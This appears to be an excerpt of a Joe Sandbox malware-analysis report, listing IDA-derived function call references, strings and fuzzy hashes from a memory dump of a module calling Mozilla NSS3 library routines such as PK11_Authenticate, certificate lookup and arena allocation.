Part of subcall function 6C6B1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C6B137E
Part of subcall function 6C6B1340: PL_ArenaGrow.NSS3(?,6C64F599,?,00000000,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?), ref: 6C6B13CF
Part of subcall function 6C6B1340: PR_Unlock.NSS3(?,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C6B145C

PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6B8C38
PORT_ArenaAlloc_Util.NSS3(?,00000050), ref: 6C6B8C59
PR_GetCurrentThread.NSS3 ref: 6C6B8D33
PR_GetCurrentThread.NSS3 ref: 6C6B8D59

Part of subcall function 6C719BF0: TlsGetValue.KERNEL32(?,?,?,6C760A75), ref: 6C719C07

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalCurrentEnterSectionThreadUnlock$GrowGrow_Mark_
String ID:
API String ID: 3225201373-0
Opcode ID: aaf4eb2297db805dea18e9f07ac4e2c4e9623351d84698b0dd72aea144de26ed
Instruction ID: 5084811beb18ea9f1e77b32dfc57f4ea55118cc5462f520756d36cec9111c00e
Opcode Fuzzy Hash: aaf4eb2297db805dea18e9f07ac4e2c4e9623351d84698b0dd72aea144de26ed
Instruction Fuzzy Hash: 68613AB4A016029FD704CF19D580B517BE0FF5D308F1582AAE9089FB62EB71E965CF98

Function 6C5D8AE3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 144stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A0148,BINARY), ref: 6C5D8B24

Strings

BINARY, xrefs: 6C5D8B1E
Vyl, xrefs: 6C5D8F42
,%s%s%s, xrefs: 6C5D8B5B
k(%d, xrefs: 6C5D8AF8
ydyl, xrefs: 6C5D8B2E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: strcmp
String ID: ,%s%s%s$BINARY$Vyl$k(%d$ydyl
API String ID: 1004003707-3376798145
Opcode ID: 438de3fa26a1a4b74c739dd2cd74ea86ad36f7c8150220ae59bddb150cc26b01
Instruction ID: 52622704622bc6dcc3de207b502579e4ac453d81c41758014088f3f4a10ee553
Opcode Fuzzy Hash: 438de3fa26a1a4b74c739dd2cd74ea86ad36f7c8150220ae59bddb150cc26b01
Instruction Fuzzy Hash: 865180B06083419FD304CF19C884B6AB7E2FF85308F05999DE9898BB92D775F845CB86

Function 6C6B6A70 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

DER_GetInteger_Util.NSS3(?), ref: 6C6B6ABF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Integer_Util
String ID:
API String ID: 2649942920-0
Opcode ID: 7956a79e27a4ca2600aaf760515f72a58cc9662c0c37924fcebcb378f5016430
Instruction ID: 0731b1fa7819baf361d2241bd2839a4442f2e61eb23379936114296a11ed47e7
Opcode Fuzzy Hash: 7956a79e27a4ca2600aaf760515f72a58cc9662c0c37924fcebcb378f5016430
Instruction Fuzzy Hash: 575138B09017058FEB288F25D845B967BF4EF08318F10492DE9AED7B52E731E425CB99

Function 6C68EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C68EF38

Part of subcall function 6C679520: PK11_IsLoggedIn.NSS3(00000000,?,6C6A379E,?,00000001,?), ref: 6C679542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C68EF53

Part of subcall function 6C694C20: TlsGetValue.KERNEL32 ref: 6C694C4C
Part of subcall function 6C694C20: EnterCriticalSection.KERNEL32(?), ref: 6C694C60
Part of subcall function 6C694C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C694CA1
Part of subcall function 6C694C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C694CBE
Part of subcall function 6C694C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C694CD2
Part of subcall function 6C694C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C694D3A

PR_GetCurrentThread.NSS3 ref: 6C68EF9E

Part of subcall function 6C719BF0: TlsGetValue.KERNEL32(?,?,?,6C760A75), ref: 6C719C07

free.MOZGLUE(00000000), ref: 6C68EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C68F016
free.MOZGLUE(00000000), ref: 6C68F022

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 193e45471585095125124e0e9b92efe8fd013fe64773360420aa67faf0aa62ef
Instruction ID: 6273c486a7b59ef7c815cb76326d4a6e881225dcd703cd0e19cbf82bb2cd628d
Opcode Fuzzy Hash: 193e45471585095125124e0e9b92efe8fd013fe64773360420aa67faf0aa62ef
Instruction Fuzzy Hash: BC41B2B1E0120AAFDF018FA9DC44BEE7BB9AF49348F144025F914A6350E772C9158BB9

Function 6C664860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C664894

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6648CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6648DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C6648FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C664912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C66494A

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 2627065d2b2febc7dcd80c3fed7336729dc9c53d8eda749fcdafdd943b8c865a
Instruction ID: d191bc58d32f35d541201a852207e1d48aaef9390853898f2be124acaa6c8575
Opcode Fuzzy Hash: 2627065d2b2febc7dcd80c3fed7336729dc9c53d8eda749fcdafdd943b8c865a
Instruction Fuzzy Hash: 6A41C3706043056BE704CF6AD890BAB73E8AF85358F14062CEA5597B41F7B0D945CB5B

Function 6C6E8AF0 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6C6D6F38), ref: 6C6E8B0B
NSS_OptionGet.NSS3(00000008,?), ref: 6C6E8B58
NSS_OptionGet.NSS3(00000009,?), ref: 6C6E8B6A
NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6C6D6F38), ref: 6C6E8BBB
NSS_OptionGet.NSS3(0000000A,?), ref: 6C6E8C08
NSS_OptionGet.NSS3(0000000B,?), ref: 6C6E8C1A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID:
API String ID: 927613807-0
Opcode ID: 3e8eff2ad96464cc1805b8e6eda9266a318e4c7b110a26347fbb4ade809516e0
Instruction ID: b0ce11863354b99a013188432470ded65c5d80b6f40b84a5d59f0b2b6d9368a1
Opcode Fuzzy Hash: 3e8eff2ad96464cc1805b8e6eda9266a318e4c7b110a26347fbb4ade809516e0
Instruction Fuzzy Hash: D34128A0B0710587EF00ABAEDD917EE36B5EB4E308F844433C949D7AD0F3209A45879E

Function 6C67CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C67CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C67D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C67D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C67D025
PR_NewLock.NSS3 ref: 6C67D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C67D074

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: b23781599df550cda2372c8b9a2b65f543ad1cbd4405802384db8e309a6b7860
Instruction ID: 79ea88b1fcbb8423cd0d8289845fd35db8351fd1248ed1845f97c588f3ae3957
Opcode Fuzzy Hash: b23781599df550cda2372c8b9a2b65f543ad1cbd4405802384db8e309a6b7860
Instruction Fuzzy Hash: C641E3B0A013019FDF20DF29C88878A7BE4EF08358F10596ADC198BB46D774D885CBB9

Function 6C6B8810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C6B86AA), ref: 6C6B8851

Part of subcall function 6C6B1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C6B136A
Part of subcall function 6C6B1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C6B137E
Part of subcall function 6C6B1340: PL_ArenaGrow.NSS3(?,6C64F599,?,00000000,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?), ref: 6C6B13CF
Part of subcall function 6C6B1340: PR_Unlock.NSS3(?,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C6B145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6C6B86AA), ref: 6C6B886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6C6B8890
PR_GetCurrentThread.NSS3 ref: 6C6B891C
PR_GetCurrentThread.NSS3 ref: 6C6B8937

Part of subcall function 6C719BF0: TlsGetValue.KERNEL32(?,?,?,6C760A75), ref: 6C719C07

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: 9c051d9c326b7e8991fb2647483588e1d57f2cf8a56874711e36844bb997595e
Instruction ID: 6e7001013d38fde4520f9a90e58203bfff95aa396a3ffcfe2d6059eb5ce44c47
Opcode Fuzzy Hash: 9c051d9c326b7e8991fb2647483588e1d57f2cf8a56874711e36844bb997595e
Instruction Fuzzy Hash: F941A9B0A01603AFEB04DF29D894B91B7E4FF49308F144269D8189B761EB72E974CBD5

Function 6C6C8890 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000004,?), ref: 6C6C88C0
PK11_HashBuf.NSS3(00000003,?,?,?), ref: 6C6C88E0
NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C6C8915
HASH_ResultLenByOidTag.NSS3(00000000), ref: 6C6C8928
PK11_HashBuf.NSS3(00000000,?,?,?), ref: 6C6C8957
PK11_HashBuf.NSS3(00000004,?,?,?), ref: 6C6C8980

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: HashK11_$AlgorithmPolicy$Result
String ID:
API String ID: 2238172455-0
Opcode ID: 7dac42f214ee3b5fd58640f84d5829d5768cd0ee6c30431375115ff53e3c6563
Instruction ID: 3b5539033a106e410a547475451a93614a9e1a022515a1176b468f4111075dda
Opcode Fuzzy Hash: 7dac42f214ee3b5fd58640f84d5829d5768cd0ee6c30431375115ff53e3c6563
Instruction Fuzzy Hash: 29312EB2A04115ABFB108E589D40BEB7398DF0A318F140532EE1897691F331DD1483EF

Function 6C662E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C652D1A), ref: 6C662E7E

Part of subcall function 6C6B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C658298,?,?,?,6C64FCE5,?), ref: 6C6B07BF
Part of subcall function 6C6B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6B07E6
Part of subcall function 6C6B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B081B
Part of subcall function 6C6B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B0825

PR_Now.NSS3 ref: 6C662EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C662EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C652D1A), ref: 6C662F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C652D1A), ref: 6C662F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C662F81

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 6b07c725085597f8747be8f02724ca0978570fab7e286339c927f80b8baa832b
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: CA31F3715411008BE710C657CC88BAEB365EF81358F64497AD42AA7ED0EB31988AC75F

Function 6C676B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C676BA9

Part of subcall function 6C679520: PK11_IsLoggedIn.NSS3(00000000,?,6C6A379E,?,00000001,?), ref: 6C679542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C676BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C676BD7
PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6C676B97

Part of subcall function 6C691870: TlsGetValue.KERNEL32 ref: 6C6918A6
Part of subcall function 6C691870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C676C34,?,?,00000001,00000000,00000007,?), ref: 6C6918B6
Part of subcall function 6C691870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C676C34,?,?), ref: 6C6918E1
Part of subcall function 6C691870: PR_SetError.NSS3(00000000,00000000), ref: 6C6918F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6C676C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C676C61

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: 6390888faaed5d4abeaaf47b9aa8de983bfc56938fda5c05d78da34dbd524dff
Instruction ID: e2800295c6fee74c39eacc8a8012a7a2533fc6550145480f458f4f298f660293
Opcode Fuzzy Hash: 6390888faaed5d4abeaaf47b9aa8de983bfc56938fda5c05d78da34dbd524dff
Instruction Fuzzy Hash: DC3127B1A00302ABE7208F54DC81FAA7768EF06758F040469ED08AB392E771DC61C6FD

Function 6C650E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C650A2C), ref: 6C650E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C650A2C), ref: 6C650E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C650A2C), ref: 6C650E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C650A2C), ref: 6C650E90
free.MOZGLUE(00000000), ref: 6C650EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C650A2C), ref: 6C650ED9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: b42e53ac7ee77110eb8c45b4cd58700397d176c9b4692362ba96b9ccd07ee72f
Instruction ID: b54aa62a423b8e2f24136349cc35f578237e9facc757e54bbac3f2cfb7fd2587
Opcode Fuzzy Hash: b42e53ac7ee77110eb8c45b4cd58700397d176c9b4692362ba96b9ccd07ee72f
Instruction Fuzzy Hash: 2D216E73F0028557EB0049669C45BAB76AEDFC270CFB94435D81863A02FA70C83783AA

Function 6C63A9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6C719270), ref: 6C63A9BF
PR_IntervalToMilliseconds.NSS3(?,?,6C719270), ref: 6C63A9DE

Part of subcall function 6C63AB40: __aulldiv.LIBCMT ref: 6C63AB66

Part of subcall function 6C71CA40: LeaveCriticalSection.KERNEL32(?), ref: 6C71CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6C63AA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6C63AA39
EnterCriticalSection.KERNEL32(?), ref: 6C63AA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C63AAEB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: fcae92ca195cd69f6a4fca3683c25e57e12b1992c3eddd3435856c1064fe7952
Instruction ID: e95712ff611ba3c4e07b99e1fd5d0efefbbb847cf24e4b8162c92c97e5db42a1
Opcode Fuzzy Hash: fcae92ca195cd69f6a4fca3683c25e57e12b1992c3eddd3435856c1064fe7952
Instruction Fuzzy Hash: E841DF71604311DFDB009FA8C5847D6BBF1FB06328F28A66DE45E8B642DB72D881DB84

Function 6C6688D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C670725,00000000,00000058), ref: 6C668906
EnterCriticalSection.KERNEL32(?), ref: 6C66891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C66894A
